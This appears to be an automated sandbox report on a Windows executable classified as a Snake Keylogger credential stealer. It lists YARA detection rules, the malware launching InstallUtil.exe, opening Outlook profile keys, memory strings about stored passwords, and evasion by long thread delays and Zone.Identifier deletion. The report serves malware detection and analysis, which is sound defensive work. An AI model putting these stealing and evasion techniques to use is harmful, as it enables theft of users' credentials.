                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sS7Jrsk0Z7.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: sS7Jrsk0Z7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: sS7Jrsk0Z7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002E3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002E18000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002DFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: sS7Jrsk0Z7.exeReversingLabs: Detection: 75%
                    Source: sS7Jrsk0Z7.exeVirustotal: Detection: 65%
                    Source: unknownProcess created: C:\Users\user\Desktop\sS7Jrsk0Z7.exe "C:\Users\user\Desktop\sS7Jrsk0Z7.exe"
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: sS7Jrsk0Z7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: sS7Jrsk0Z7.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3c98e40.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3d18e60.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3c98e40.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.5070000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3d18e60.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.5070000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1806875709.0000000005070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1805361382.0000000003D18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1798101450.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTR
Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_076D36B8 pushfd ; retf 1_2_076D3E11
Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_076DD84C push FFFFFF8Bh; retf 1_2_076DD84E
Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_076DA01D push esi; ret 1_2_076DA023
Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0780F3C3 push 0C077FAAh; iretd 1_2_0780F3CD
Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_078BBBE3 push ecx; ret 1_2_078BBC12
Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_078BBBCF pushad ; ret 1_2_078BBBD3
Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_078BDA95 pushad ; ret 1_2_078BDAF3
Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_078BAAC5 push esi; ret 1_2_078BAAC6
Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0798C98E push ebp; ret 1_2_0798C9A5
Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0798090C push es; ret 1_2_0798090F
Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0798752B push cs; ret 1_2_0798752C
Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_079828D2 push cs; retf 1_2_079828D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_01239C30 push esp; retf 02A4h 10_2_01239D55

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | File opened: C:\Users\user\Desktop\sS7Jrsk0Z7.exe\:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Process information set: NOOPENFILEERRORBOX (49 times)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX (58 times)

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: OutputDebugStringW count: 126
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: 1070000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: 2AB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: 7E50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: 8E50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: 9020000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: A020000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: A3B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: B3B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: C3B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1230000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 599891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 599766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 599656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 599547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 599438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 599313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 599188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 599078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 598957
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 598829
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 598704
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 598579
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 598454
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 598329
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 598204
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 598079
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 597954
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 597829
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 597704
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 597579
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 597454
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 597329
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 597204
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 597079
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 596954
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 596829
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 596704
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 596579
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 596454
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 596329
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 596204
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 596079
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 595954
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 595829
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 595704
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 595579
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 595454
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 595329
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 595204
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 595078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 594969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 594844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 594735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 594610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 594485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 594360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 594235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 594110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Thread delayed: delay time: 593985
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Window / User API: threadDelayed 1697
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Window / User API: threadDelayed 6252
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Window / User API: threadDelayed 8432
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Window / User API: threadDelayed 1386
